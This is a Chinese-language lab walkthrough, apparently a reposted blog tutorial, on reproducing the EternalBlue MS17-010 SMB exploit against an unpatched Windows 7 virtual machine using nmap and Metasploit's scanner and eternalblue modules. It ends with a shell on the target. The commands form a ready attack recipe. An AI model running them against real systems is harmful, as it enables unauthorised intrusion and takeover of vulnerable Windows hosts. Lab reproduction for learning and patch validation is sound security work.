一、漏洞介绍
1.永恒之蓝简介
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
2.漏洞原理
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
二、环境搭建
1.准备环境
攻击机:Kail(IP:192.168.20.15)
靶机:windows7(IP:192.168.20.10)
2.环境条件
两台主机能够互通通信,且靶机未打补丁以及开启445端口,关闭防火墙。
三、复现过程
1.端口扫描
通过攻击机Kail的nmap进行端口扫描,通过扫描能够发现靶机的445端口是开启的。
nmap 192.168.20.10
2.使用MSF的永恒之蓝漏洞模块
(1)打开MSF:
msfconsole
(2)搜索 ms17-010 代码:
search ms17_010
0 exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。
3 auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块。
一般先通过扫描模块对目标主机进行扫描判断是否存在漏洞,若存在漏洞再通过攻击模块进行攻击。
(3)扫描模块
使用扫描模块对靶机进行扫描:
use auxiliary/scanner/smb/smb_ms17_010
查看配置参数:
show options
设置靶机或者目标IP:
set rhosts 192.168.20.10
执行扫描:
run
通过扫描能够发现靶机可能会受到MS17-010的攻击。
(4)攻击模块
使用攻击模块对靶机进行攻击:
use exploit/windows/smb/ms17_010_eternalblue
可以查看攻击模块能够攻击那些操作系统:
show targets
设置靶机或者目标IP:
set rhosts 192.168.20.10
执行攻击:
exploit 或 run
攻击全过程
3.攻击完成
通过上面的攻击,成功拿到靶机的shell。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/133446.html
